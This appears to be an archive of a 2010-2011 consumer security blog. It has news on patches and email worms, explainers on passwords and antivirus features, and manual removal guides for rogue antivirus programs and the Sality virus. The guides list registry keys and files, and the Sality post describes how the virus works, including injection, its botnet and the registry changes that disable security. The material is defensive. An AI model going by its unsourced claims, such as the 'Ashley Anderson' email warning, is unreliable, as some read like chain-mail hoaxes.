Computer Virus

BSNL launches VVoIP service in India

2011-08-08T08:57:00.000-07:00

The state run Telecom company BSNL has launched yet another ground breaking service in India after Voice over Internet Protocol (VoIP). The new service is Voice and Video over Internet Protocol (VVoIP).

Using this service BSNL customers can make audio and video calls at their will using land phone or mobile or Internet Protocol phone anywhere in the world, provided both ends must have video phones.

BSNL has partnered with Sai Infosystem (SiS) to make this a reality. The service was initially available in Ahmedabad. But by the end of this month, the service will be available in entire Gujarat. By the end of March 2012, whole India will be under the coverage. According to BSNL, the new service will be more economical than the conventional services. BSNL is working with major international carriers to ensure trouble free service.

The customers will be charged 40 paise per minute for audio and Rs 2 per minute for video calls within the country using VVoIP. The international tariff is also low. The VVoIP service can be made available with a monthly rental of just Rs 150.

New e-mail virus: email from Ashley Anderson

2010-10-14T08:29:00.000-07:00

As the days are passing by, more and more malwares are released into the cyber space causing agony to the computer users. Now a new email virus has been reported. When you check e-mails, if you found an email from Ashely Anderson, then delete it imediately as it is a virus. The email comes with an attachment and the name of the sender made the people open the attachment and causes damage to their computers. So if you receive such an email, please dont open it, just delete it. It is supposed that the attachment contains a trojan that will copy the files from the system and also damages the files. Since it is a trojan, there is a high chance for the stealing of valuable data in the computer including details of the bank accounts. The trojan allow the sender to intrude into the victims computer and can control the victims computer or stole valuable data from the victim's computer. The easiest way to avoid any kind of problems, as per the experts, is to delete the email immediately.

Microsoft releases security patches to fix 49 vulnerabilities

2010-10-13T06:48:00.000-07:00

Microsoft on Tuesday, released its largest ever batch of security patches to fix a record 49 vulnerabilities in Internet Explorer, Windows and other software.The Internet Explorer patch is aimed at fixing as many as twelve vulnerabilities. Due to the risk of zero-click drive-by download attacks, the company is suggesting Windows users to apply this patch immediately. The IE versions 7 and 8 running on Windows Vista and Windows 7 are said to be vulnerable to concerned attacks though these versions are claimed to have lessen the affect of such attacks.

Numerous other holes also make it possible to run a malicious code in the Windows common control library as well as the Microsoft foundation class library. But, these holes carried lesser ratings as they can be exploited only on using third-party browsers and file-archiving programs.

The patches also fix vulnerability in Windows XP which was exploited by the Stuxnet worm that is believed to have been released in order to disrupt Iran's nuclear program. The malware spread by exploiting four formerly unpatched Windows security holes. Tuesday's security release fixes three of these holes, while the fourth will be fixed in a future update.
According to Symantec (Norton Antivirus Provider), out of the total 49 flaws, 35 could give hackers the means to run malicious code on victim's computers. Microsoft has already released 86 security patches so far this year, as compared with a total of 74 security bulletins in the previous year.

'Here you have' e-mail virus threatens the computer world

2010-09-16T05:55:00.000-07:00

Recently a massive virus hit e-mail accounts across the world, including the major corporation gaints like Google, Coca-cola, NASA. The trojan virus spread through e-mails with subject lines that read 'Here You Have,' while other versions of worm are hidden under the subject lines like 'This is The Free Download Sex Movies, you can find it here,' and 'Just For You.' Each e-mail contained a link that, if clicked, would download malware into a recepient's computer, and send a wave of similar e-mails to his or her contacts. Although the exact number of victims are not known, the virus attack has forced several employees to abandon their e-mail accounts altogather.
McAfee published a report on its blog, saying that the risk of infection on both home and work e-mail accounts is "low," while acknowledging that it may take time to root out all of the virus's multiple variants. The security firm also identified the virus as a trojan horse, but had not yet determined its origins. Symantec, meanwhile, told ABC that the worm, which it has called 'W32.Imsolk.A@mm,' is similar to the 'Anna Kournikova' worm that hit computers in 2001, and also spread under the 'Here You Have' subject. If you receive e-mails with suspicious subject lines, delete them instantly.

Adobe sounds alarm about the attacks on Flash

2010-09-15T04:45:00.000-07:00

Adobe has warned the users of its pdf reader about the bugs in the reader and hackers were exploiting these bugs. But now it has come up with the shocking news of the bugs in the one of the most popular software- Adobe Flash. It is a matter of worry since almost all the computer users view video in their browsers with the help of Flash software. However the company told that it would patch Flash in two weeks and Reader in three weeks.In a new security advisory on Monday, Adobe said that the current version of Flash contains a critical flaw already being used in the wild by criminals to attack Windows PCs. According to the advisory, "This vulnerability could cause a crash and potentially allow an attacker to take control of the affected system".
Unfortunately, the flaw is present in all the Flash including the editions for Mac, Linux, Android.. But Adobe described the attacks as "targeted" and limited". The attacks were targeted against the windows users. The same bug is also present in Adobe Reader and Acrobat, the company's free PDF viewer, and its commercial PDF creation tool. This is quite natural since both Reader and Acrobat include code to run Flash content embedded in PDF documents, making a bug in Adobe's media player typically require a patch for the PDF programs.
Adobe said it would update Flash to fix that program's flaw in two weeks, sometime during the week of Sept. 27. The two bugs in Reader and Acrobat -- the one disclosed last week and Monday's -- will be patched in the week of Oct. 4 with an emergency, or out-of-band security update.

How to remove IronDefender

2010-09-14T05:06:00.000-07:00

I have written articles about several malwares that disguises themselves as the malware removal tool. Here is one more malware that disguises itself as the useful malware removal tool. It's function is almost same as that of the other disguised malwares. It does not scan your computer or find any virus or malware. When IronDefender is installed in a computer it will start along with windows on the next booting. It will perform a fake scan and informs the user that a harmful malware is present in his computer and it has to be removed. It asks the user to register IronDefender by paying a price for registration. Actually the message is a lie to make the poor victim to pay for the malware.
IronDefender will display options that other genuine antivirus as- "Full Scan", "System Scan", "Scan Basic Locations", "Scan Removable Media", "Scan Folder", "Realtime protection" and "Tools". All of the features do not really protect the computer but just show the fake functions only.
If you are a victim of the IronDefender, ir has to be removed immediately !....

Removal:

Kill the process

F0E84.exe
vur4.exe
[random].exe

Delete the registry

HKEY_CURRENT_USER\Software\IronDefender
HKEY_LOCAL_MACHINE\SOFTWARE\IronDefender
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IronDefender
HKEY_CURRENT_USER\Software "Install_Dir" = "C:\Program Files\FDFCA"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "vur4.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "F0E84.exe"

Delete the files and folders

%ALLUSERSPROFILE%\Start Menu\Programs\IronDefender.lnk
%ProgramFiles%\FDFCA\
%ProgramFiles%\FDFCA\F0E84.exe
%ProgramFiles%\FDFCA\Uninstall.exe
%SystemRoot%\[random].exe
%SystemRoot%\[random].bin
%SystemRoot%\[random].dll
%SystemRoot%\[random].cpl
%SystemRoot%\system32\[random].exe
%SystemRoot%\system32\[random].bin
%SystemRoot%\system32\[random].dll
%SystemRoot%\system32\[random].cpl
%UserProfile%\Desktop\hash
%UserProfile%\Desktop\IronDefender.lnk
%UserProfile%\Local Settings\Temp\[random].exe

Camouflage Viruses

2010-08-27T20:40:00.000-07:00

You may not heard about Camouflage viruses. It is becacuse, it has never became a threat thanks to the evolution of advanced antivirus scanners. Camouflage viruses are viruses that are capable of infecting a computer by reporting it as a harmless application to the antivirus software installed in that computer. In the less sophisticated antivirus softwares, the scanning is performed by checking the files for the virus signatures. In such cases, there is a possibility of non-infected files have codes similar to that of the virus codes (a statistical probability) will be notified to the user as virus infected files - a false alarm. This may frighten the user. To avoid this problem, the antivirus softwares implement a logic to ignore a virus signature and not issue alarm under right circumstance.
Eventhough this logic avoid the chances of false alarm, it has opened a door for the virus creators to attempt to camouflage their viruses so that they included the specific characteristics the antivirus softwares were checking for and thus have the antivirus program ignore that particular virus. Fortunately, camouflage virus never became a serious threat, but the possibility existed.
Today, the antivirus scanners are more advanced that they do much more than simply look for a virus signature string. In order to identify the specific virus varient, they not only check for the virus signature, but also even checksum the virus code to identify it. Due to the provision of these cross checks in the antivirus scanner, it would be very difficult for the virus to camouflage itself and spoof the scanner.

Sality Virus : Know more?

2010-08-27T00:37:00.000-07:00

When I noticed that most of the visitors to my blog are searching for the remedies for infection by Sality Virus. I have already put a brief post on Sality virus at creatingcomputervirus.blogspot.com/2010/03/sality-virus-symptoms-and-removal.html. Now I think more information must be provided innorder to satisfy the visitors. Sality is also known as W32/Kookoo-A [Sophos]. Sality was discovered in 2003 June 4. It affects the Operating Systems - Windows 98, Windows 95, Windows XP, Windows Me, Windows NT, Windows 2000.

It will infect executable files on local, removable and remote shared drives. The virus also creates a peer-to-peer (P2P) botnet and receives URLs of additional files to download. It then attempts to disable security software. When it infected my system, it disabled my antivirus software (BitDefender Free Edition), and antimalware software (MalwareBytes Free Edition). It also prevent the use of the anti rootkit software Rootkit Revealer.
Some forms of Sality virus is reported to steal the key strokes from the infected machines for malicious purposes.W32.Sality will infect executable files on local, removable and remote shared drives. It replaces the original host code at the entry point of the executable to redirect execution to the polymorphic viral code, which has been encrypted and inserted in the last section of the host file. In addition to infecting local and remotely shared executable files, W32.Sality will purposely search for specific registry subkeys to infect the executable files that run when Windows starts. Thus infected computer is like a country under the rule of the terrorists. All the security will be paralysed leading to complete crack down of the system. Sality will also prevent the installation of the antivirus in to the infected computer.
In 2003 when it was first discovered, W32.Sality was a less complicated file infector, prepending its viral code to a host file and having back door capability and keylogging functionality. As years passed, it became more sophisticated by including additional features that aid worm-like propagation, ensure its survival, and perform maliciously damaging activities. Among these activities is the decentralized peer-to-peer network (P2P) that W32.Sality-infected computers create and populate.
As an entry-point obscuring (EPO) polymorphic file infector, the virus gains control of the host body by overwriting the file with complex and encrypted code instructions. The goal of the complex code is to make analysis more difficult for researchers to see the real purpose and functionality implemented in the code.It spreads by infecting executable files on local, removable and remote shared drives. Infected files will have their original, initial instructions overwritten by complex code instructions with the encrypted viral code body located in the last section of the file.
Downloading and executing other malware or security risks is one of the primary goals of this virus. A compromised host carries with it a list of HTTP URLs that point to resources to be downloaded, decrypted, and executed. These URLs can also point to more URLs. The encryption used is RC4 with static keys embedded in the compromised host.

Technical Details:

In addition to infecting local and remotely shared executable files, W32.Sality will purposely search for the following registry subkeys to infect the executables associated with that subkey, including those executables that run when Windows starts:

HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Files Created:
%System%\drivers\[RANDOM FILE NAME]

Registry Subkeys Created:

HKEY_CURRENT_USER\Software\[USER NAME]914
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_WMI_MFC_TPSHOKER_80

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_IPFILTERDRIVER

Registry entries deleted

HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects

Registry entries modified (final values given)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\"[INFECTED FILE]" = "[INFECTED FILE]:*:Enabled:ipsec"

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Setting\"GlobalUserOffline" = "0"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\"EnableLUA" = "0"

Process Injected:

W32.Sality will not inject into processes that belong to the system, the local service or the network service. However, it does inject complex code instructions into other processes, allowing the code to load external DLLs that are downloaded from remote servers into target processes. This virus uses a named mutex based on the injected process ID (PID) for each injection so that it avoid repeatedly injecting code into the same processes.

Recommendations:

Use a firewall to block all incoming connections from the Internet to services that should not be publicly available. By default, you should deny all incoming connections and only allow services you explicitly want to offer to the outside world.

Enforce a password policy. Complex passwords make it difficult to crack password files on compromised computers. This helps to prevent or limit damage when a computer is compromised.

Ensure that programs and users of the computer use the lowest level of privileges necessary to complete a task. When prompted for a root or UAC password, ensure that the program asking for administration-level access is a legitimate application.

Disable AutoPlay to prevent the automatic launching of executable files on network and removable drives, and disconnect the drives when not required. If write access is not required, enable read-only mode if the option is available.

Turn off file sharing if not needed. If file sharing is required, use ACLs and password protection to limit access. Disable anonymous access to shared folders. Grant access only to user accounts with strong passwords to folders that must be shared.

Turn off and remove unnecessary services. By default, many operating systems install auxiliary services that are not critical. These services are avenues of attack. If they are removed, threats have less avenues of attack.

If a threat exploits one or more network services, disable, or block access to, those services until a patch is applied.

Always keep your patch levels up-to-date, especially on computers that host public services and are accessible through the firewall, such as HTTP, FTP, mail, and DNS services.

Configure your email server to block or remove email that contains file attachments that are commonly used to spread threats, such as .vbs, .bat, .exe, .pif and .scr files.

Isolate compromised computers quickly to prevent threats from spreading further. Perform a forensic analysis and restore the computers using trusted media.

Train employees not to open attachments unless they are expecting them. Also, do not execute software that is downloaded from the Internet unless it has been scanned for viruses. Simply visiting a compromised Web site can cause infection if certain browser vulnerabilities are not patched.

If Bluetooth is not required for mobile devices, it should be turned off. If you require its use, ensure that the device's visibility is set to "Hidden" so that it cannot be scanned by other Bluetooth devices. If device pairing must be used, ensure that all devices are set to "Unauthorized", requiring authorization for each connection request. Do not accept applications that are unsigned or sent from unknown sources.

Removal:

Since it is hard to install antivirus software in an infected system, it is better to remove it by scanning the infected computer from another computer with an antivirus software capable of detecting and removing Sality virus. Otherwise you may try manual removal which is not recommended.

Patches

2010-08-12T20:50:00.000-07:00

You mave have heard the term patches several times while using computer. But many of the people don't know what a patch is. Now let us know what a patch is ?
Today, there are hundreds or perhaps thousands of companies that produces softwares for different purposes. These softwares are created by brilliant people according to the specifications given by the customer or by the standards set by the firm. If the software is very large, or has lot of functions, it is generally developed by a group of software engineers by working as a team. After manufacturing the software, it has to be tested for stability and vulnerabilities before handing over to the customer. For this there is a set of tools for software testing. During testing several bugs are found out and they are rectified. After passing the software testing, the software is declared ready for use.
You know, 'to error is human'. Like that every thing that is made by humans will have certain quantity of error in it. Same is the case of the software testing. The softwares that successfully pass the software testing need not be free from vulnerability and bugs. In most cases there will be bugs. In the case of important softwares as used in banks and finantial organisations, the software is tested several times, sometimes may test in sample populations to ensure that the software is free from bugs.
If a bug or vulnerability is found in a software after given to the customer for the use, the software manufacturer releases patch for that software. The goal of the patch is to ensure the correct functioning of the software and to insure that the software is not vulnerable to viruses. A software patch would be applied to a specific program to correct an error in function where as an anti-virus patch might seek to correct specific vulnerabilities linked to the functioning of one particular virus. A security patch, on the other hand, might be designed to strengthen aspects of a machine's connection to a network or to the Internet to guard against incursions into the system from outside sources.
Service packs are groupings of other patches, usually too numerous or complex to be installed one at a time. Usually service packs are directed at repairing known issues in larger software environment like operating systems. Microsoft releases several patches for the operating systems and these pathes are installed during the update of Windows. If you are using Windows Operating System, then install latest patches by Microsoft to make your system more secure against vulnerabilities and software attacks.

How to choose passwords

2010-07-12T22:48:00.000-07:00

The era of inland letters and postal greetings is approaching end. Today we could hardly find a person who uses postal service to get in touch with the relatives thanks to the technological developments. The arrival of new players like telecommunication and internet had pushing out the traditional services like postal out of the play ground. Today it is very hard to find a person without email ID. We all of us have email ID and a password to open the email account. The password is created at the time of creating the email ID. Since password can be stolen or guessed, most of the email service providers allows to change the password. While creating password most of the users create password carelessly. Some of them even forget the password after the account is created. The password must be chosen very wisely since internet is the best way to spread bad impression of a person to a great number of people.
Microsoft recommends the password must be at least 14 characters long. The strength of a password is determined by the different types of characters you use. It is always better not to use the words find in dictionaries as passwords. If words from dictionaries are used, the hacker can easily guess the password of your account. Also bear in mind do not use common passwords. Most of the people uses 123456 as password. How simply a hacker can find such a password ? Also don't use locally used words as password. It is very common trend in Kerala to write the PIN number over the ATM cards. It is like handling key of your account to the thief.
You can check the strength of your password at: https://www.microsoft.com/protect/fraud/passwords/checker.aspx?WT.mc_id=Site_Link

Real Time Protection

2010-07-12T01:40:00.000-07:00

Real Time Protection is one of the features provided by most of the anti viruses. On-access scanning, background guard, resident shield, autoprotect are the other terms that represent real time protection. The term real time protection refers to the feature of the anti malware programs that monitors all the files in the system as well as the data coming into the computer from the internet. It also scans the files in the memory. If any change in the file or the data coming to the computer is found suspicious, then it will be reported to the user. If necessary the user can consult the recommendations from the experts by submitting the suspicious files to the anti malware manufacturer. The real time protection monitors the changes made in the files located in the hard drives and memory and also the data flowing to the computer from the internet while browsing checking emails and also when downloading files. Real time protection also includes monitoring the removable drives like CD, floppy, pen drives etc. In short the real time protection enables even the beginner to use the computer safely without even having the basic knowledge related to security issues.
Most real-time protection systems hook certain API functions provided by the operating system in order to scan files in real-time. For example, on Microsoft Windows, an antivirus program may hook the CreateProcess API function which executes programs. It can then scan programs which are about to be executed for malicious software. If malicious software is found, the antivirus program can block execution and inform the user.

Avast, Avira, Comodo Internet Security are some of the programs with real time protection. It is recommended to use an antivirus with real time protection so that malware can be blocked before it infects the PC. If viruses like Sality infects the PC, the whole security of the computer will be compromised. So it is better to prevent it before entering the system.

PC AntiSpyware 2010

2010-07-09T04:45:00.000-07:00

PC AntiSpyware 2010 is a rogue anti-spyware program like Home Antivirus 2010. If it got installed in your PC AntiSpyware 2010 will create numerous harmless files on your computer that will then be displayed as infections when the program scans your computer. These files are named using random characters and are created in various locations on your hard drive. These files are created solely to validate the scan results that state that the infections exist on your computer, when in reality these files cannot harm it.

PC AntiSpyware 2010 will also display a window that impersonates the Microsoft Windows Security Center. The Security center window created by the AntiSpyware 2010 will suggests that you purchase PC AntiSpyware 2010 in order to protect your computer. It will also hijack Internet Explorer so that while you are browsing you will randomly be shown a page stating that the site you are visiting is a security risk. It will then try and sell you PC AntiSpyware 2010 to protect you from this site.

The number of malware programs that disguise as useful programs are spreading at a increased rate in recent days, thus increasing the number of victims. So one must be watchful in selecting the software that is to be installed in his/her PC.

Removal: Download the latest version of Malware Bytes Anti Malware and do a scan, then remove the infected files.

USBcillin : Disguised Malware

2010-05-28T10:55:00.000-07:00

Today I was copying some of the new songs from my brother's computer to my pen drive. When I opened the pen drive in windows explorer, I noticed that a new file called USBcillin in the pen drive. My brother told me that he had installed the program but was unable to uninstall it since it was not shown in the Add or Remove Programs from the control panel. He told me it was not virus. Even though I was suspicious about the reliability of the program I didn't tell him anything. I just removed the program from the start up options in the msconfig file.

Now let me give a small information about USBcillin. USBcillin is said to be a software that protects your computer from malware when you plug in infected USB drives. However, it is just another rogue application. USBcillin is unable to protect your computer form any possible infections. The rogue modifies registry entries and drops various malicious files onto your computer.

Removal:

1. Kill processes

13882768.EXE
64080532.EXE
82215601.EXE
USBcillin.exe
QWE.TXT.EXE

For killing a process, open task manager and then choose the process tab. From the process shown select the above process and click on the end now button. A warning will be displayed. Click OK button. For more details about killing malware process click here.

2. Delete the registry values:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\”NoPropertiesMyComputer” = “0″
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\”DisableTaskMgr” = “0″
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\”NoSetFolders” = “0″
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\”NoNetHood” = “0″
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\”NoFolderOptions” = “0″
# HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\”NoDesktop” = “0″
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\”DisableCMD” = “0″
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\”NoPrinters” = “0″
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\”NoSetFolders” = “0″
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\”NoNetSetup” = “0″
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\”Window Title” = “Windows Internet Explorer”
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall\”NoAddPage” = “0″
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\”NoFind” = “0″
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\TrayNotify\”PastIconsStream” = “hex:14,00,00,00,05,00,00,00,01,00,01,00,b6,00,00,00,14,00,00,00,49,4c,00,06,b6,00,ba,00,04,00,10,00,10,00,ff,ff,ff,ff,21,00…”
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\”Userinit” = “C:\WINDOWS\system32\userinit.exe,”
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\”NoRun” = “0″
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\”DisableRegistryTools” = “0″
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\”NoViewContextMenu” = “0″
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Uninstall\”NoAddRemovePrograms” = “0″
# HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Network\”NoNetSetup” = “0″
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\”NoFileMenu” = “0″
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\”USBcillin” = “C:\WINDOWS\system32\USBcillin.exe”
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\”NoPropertiesMyComputer” = “0″
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\”NoViewContextMenu” = “0″
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\”DisableRegistryTools” = “0″
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\”NoActiveDesktop” = “0″
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall\”NoAddRemovePrograms” = “0″
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\”NoFolderOptions” = “0″
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\”NoDesktop” = “0″
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\”Shell” = “explorer.exe”
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\”NoDispCPL” = “0″
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\”NoPrinters” = “0″
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\”NoControlPanel” = “0″
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Uninstall\”NoRemovePage” = “0″
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Uninstall\”NoAddPage” = “0″
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\”NoFind” = “0″
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\”NoActiveDesktop” = “0″
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\”NoRun” = “0″
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\”NoNetHood” = “0″
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall\”NoRemovePage” = “0″
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\”NoControlPanel” = “0″
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\”DisableTaskMgr” = “0″
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\”NoDispCPL” = “0″
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\”NoFileMenu” = “0″
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu\”Order” = “hex:08,00,00,00,02,00,00,00,00,02,00,00,01,00,00,00,03,00,00,00,d2,00,00,00,00,00,00,00,c4,00,00,00,41,75,67,4d,02

To know about deleting registry values, click here.

3. Delete files

64080532.EXE
QWE.TXT.EXE
57273426.SVD
96402658.SVD
71519181.SVD
USBcillin.exe
13882768.EXE
82215601.EXE

Delete Directories:

%Temp%\

You can also delete USBcillin by using Spyware Doctor. [ Download]

Zeus Virus: Becoming more powerful

2010-04-22T09:30:00.000-07:00

Zeus virus comes of revision 1.6 with the capability of attacking Firefox and Internet Explorer. A truth that gives a chance for the Google Chrome and Opera users to rejoice. In the 5.5 million computers it has a part in protecting, 1 in each 3000 has become infected. The BBC site informs that not only does Trusteer operate in the U.K, it also is found in the U.S.A.

Zeus is a financial malware. It infects consumer PCs, waits for them to log onto a list of targeted banks and financial institutions, and then steals their credentials and sends them to a remote server in real time. Additionally, it may inject HTML into the pages rendered by the browser, so that its own content is displayed together (or instead of) the genuine pages from the bank’s web server. Thus, it is able to ask the user to divulge more personal information, such as payment card number and PIN, one time passwords and TANs, etc.

Zues Virus is understood to be the biggest culprit among the family of malware targeting the financial websites and institutions. According to some of the studies, as much as 44% of all financial malware are based upon Zeus. Despite such an alarming state, it is shocking to know that most of the Latest Security Software, even if they are updated to the latest version, are incapable of finding and removing Zeus Malware infections. In a recent study by Trusteer, it has been revealed that as much as as 55% of all the tested 10,000 computers, which were equipped with the latest updated security software and antivirus, were not able to detect and remove the traces of Zeus Virus.

The malware steals login information by recording keystrokes when the infected user is on a list of target websites. These websites are usually banks and other financial institutions. The user’s data is then sent to a remote server to be used and sold on by cyber-criminals. “We expect this new version of Zeus to significantly increase fraud losses, since nearly 30% of internet users bank online with Firefox and the infection is growing faster than we have ever seen before,” said Amit Klein, chief technology officer at Trusteer.

For more details on spread of infection visit: thepcsecurity.com/latest-security-software-cannot-detect-zeus-virus/

Removal:
Run an updated antivirus software capable of detecting Zeus virus. Alternatively an online malware scanner like Trend Micro HouseCall or Windows Live OneCare safety scanner may also be used to scan your system for bot infection. More Online Anti-virus Scanners. Anti-malware softwares like Malware Bytes and Super Anti-Spyware can also be used.

Antivirus 2010: Removal

2010-03-26T23:47:00.000-07:00

Antivirus 2010 is a fake antivirus software which may harm your computer if used. It is a cunning malware that uses advertisements to make the user pay for the malware. It displays fake Blue Screen Of Death (BSOD). In the BSOD it shows that windows has detected unregistered version of the Antivirus 2010. It has to be registered for solving the problem. Do not believe this! It is the cunning task of Antivirus 2010. The BSOD displayed by Antivirus 2010 looks like this:

If your computer displays above screen, do not trust it and do not pay for Antivirus 2010 malware.
Screenshot of Antivirus 2010 is shown below:

Symptoms:

Changes browser settings
Shows commercial adverts
Connects itself to the internet
Stays resident in background

Removal:

You can remove Antivirus 2010 by using anti malware softwares like
1. Malware Bytes Download
2. Windows Defender Download

Manual removal:

You can delete Antivirus 2010 by following the below steps.

1. Kill the process 'AV2010.exe svchost.exe wingamma.exe'
   Help: How to kill the process
2. Remove the following Registry values
     HKEY_CURRENT_USER\Software\AV2010
   HKEY_CLASSES_ROOT\AppID\{3C40236D-990B-443C-90E8-B1C07BCD4A68}
   HKEY_CLASSES_ROOT\AppID\IEDefender.DLL
   HKEY_CLASSES_ROOT\CLSID\{FC8A493F-D236-4653-9A03-2BF4FD94F643}
   HKEY_CLASSES_ROOT\IEDefender.IEDefenderBHO
   HKEY_CLASSES_ROOT\IEDefender.IEDefenderBHO.1
   HKEY_CLASSES_ROOT\Interface\{7BC7565C-5062-43CE-8797-DC2C271140A9}
   HKEY_CLASSES_ROOT\TypeLib\{705FD64B-2B7B-4856-9337-44CA1DA86849}
   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{FC8A493F-D236-4653-9A03-2BF4FD94F643}
   HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E972-E325-11CE-BFC1- 08002bE10318}\0012
   HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E972-E325-11CE- BFC1-08002bE10318}\0013
   HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0014
   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "Windows Gamma Display"

   Help: How to remove registry values

3. Unregister DLLs

   IEDefender.dll

   Help: How to unregister malicious dlls

4. Delete files

   Program Files\\AV2010\\AV2010.exe Program Files\\AV2010\\svchost.exe WINDOWS\\system32\\IEDefender.dll WINDOWS\\system32\\wingamma.exe

   Help: How to delete malicious files

5 Delete Directories
     c:\Program Files\AV2010
   c:\Documents and Settings\All Users\Start Menu\Programs\AV2010

Sality Virus: Symptoms and Removal...

2010-03-25T02:37:00.000-07:00

It was two weeks ago a friend of mine gave me his pen drive to copy some of the softwares from my computer to his computer. Since I was in a hurry and trusted my antivirus for my computer's safety, I didn't check for the viruses in the pen drive. After a few minutes I noticed that the icons of anti virus and firewall disappeared. So I tried to run the applications from the start menu, but in vain. Then I tried to run the anti malware program. It also doesn't open. Then I tried to reinstall my anti virus. But it didn't worked. At last I had to format my computer. Then I collected the details about the virus to prevent the future attack. The situation that allowed the virus to enter into my computer were:

My carelessness to disable auto run before inserting pen drive.
